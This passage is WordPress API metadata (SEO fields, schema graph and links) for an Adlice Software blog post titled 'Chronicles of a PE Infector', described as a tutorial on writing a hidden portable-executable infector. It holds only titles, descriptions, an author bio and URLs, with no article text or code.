-->","yoast_head_json":{"title":"Chronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software","description":"Writing and Analysis of a portable executable (PE) infector. 
Educational tutorial on how to write PE infector that remains hidden.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.adlice.com\/chronicles-pe-infector\/","og_locale":"de_DE","og_type":"article","og_title":"Chronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software","og_description":"Writing and Analysis of a portable executable (PE) infector. Educational tutorial on how to write PE infector that remains hidden.","og_url":"https:\/\/www.adlice.com\/chronicles-pe-infector\/","og_site_name":"Adlice Software","article_publisher":"https:\/\/www.facebook.com\/RogueKiller","article_published_time":"2014-02-07T12:48:11+00:00","article_modified_time":"2022-12-21T10:40:27+00:00","og_image":[{"width":892,"height":658,"url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","type":"image\/png"}],"author":"tigzy","twitter_card":"summary_large_image","twitter_creator":"@AdliceSoftware","twitter_site":"@AdliceSoftware","twitter_misc":{"Verfasst von":"tigzy","Gesch\u00e4tzte Lesezeit":"10\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#article","isPartOf":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/"},"author":{"name":"tigzy","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d"},"headline":"Chronicles of a PE 
Infector","datePublished":"2014-02-07T12:48:11+00:00","dateModified":"2022-12-21T10:40:27+00:00","mainEntityOfPage":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/"},"wordCount":1094,"commentCount":0,"publisher":{"@id":"https:\/\/www.adlice.com\/#organization"},"image":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","keywords":["analysis","c++","infector","patch","pe","portable executable"],"articleSection":["Tutorial"],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/","url":"https:\/\/www.adlice.com\/chronicles-pe-infector\/","name":"Chronicles of a PE Infector | Patching Legit Files \u2022 Adlice Software","isPartOf":{"@id":"https:\/\/www.adlice.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage"},"image":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","datePublished":"2014-02-07T12:48:11+00:00","dateModified":"2022-12-21T10:40:27+00:00","description":"Writing and Analysis of a portable executable (PE) infector. 
Educational tutorial on how to write PE infector that remains hidden.","breadcrumb":{"@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.adlice.com\/chronicles-pe-infector\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#primaryimage","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/Capture-2.png","width":892,"height":658},{"@type":"BreadcrumbList","@id":"https:\/\/www.adlice.com\/chronicles-pe-infector\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.adlice.com\/de\/"},{"@type":"ListItem","position":2,"name":"Chronicles of a PE Infector"}]},{"@type":"WebSite","@id":"https:\/\/www.adlice.com\/#website","url":"https:\/\/www.adlice.com\/","name":"Adlice Software","description":"Anti-malware and analysis tools","publisher":{"@id":"https:\/\/www.adlice.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.adlice.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/www.adlice.com\/#organization","name":"Adlice Software","url":"https:\/\/www.adlice.com\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","width":276,"height":276,"caption":"Adlice 
Software"},"image":{"@id":"https:\/\/www.adlice.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/RogueKiller","https:\/\/x.com\/AdliceSoftware","https:\/\/fr.linkedin.com\/company\/adlice-software","https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ"]},{"@type":"Person","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d","name":"tigzy","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.adlice.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","caption":"tigzy"},"description":"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog 
posts.","url":"https:\/\/www.adlice.com\/de\/author\/tigzy\/"}]}},"_links":{"self":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts\/179","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/comments?post=179"}],"version-history":[{"count":0,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/posts\/179\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/media\/181"}],"wp:attachment":[{"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/media?parent=179"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/categories?post=179"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.adlice.com\/de\/wp-json\/wp\/v2\/tags?post=179"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}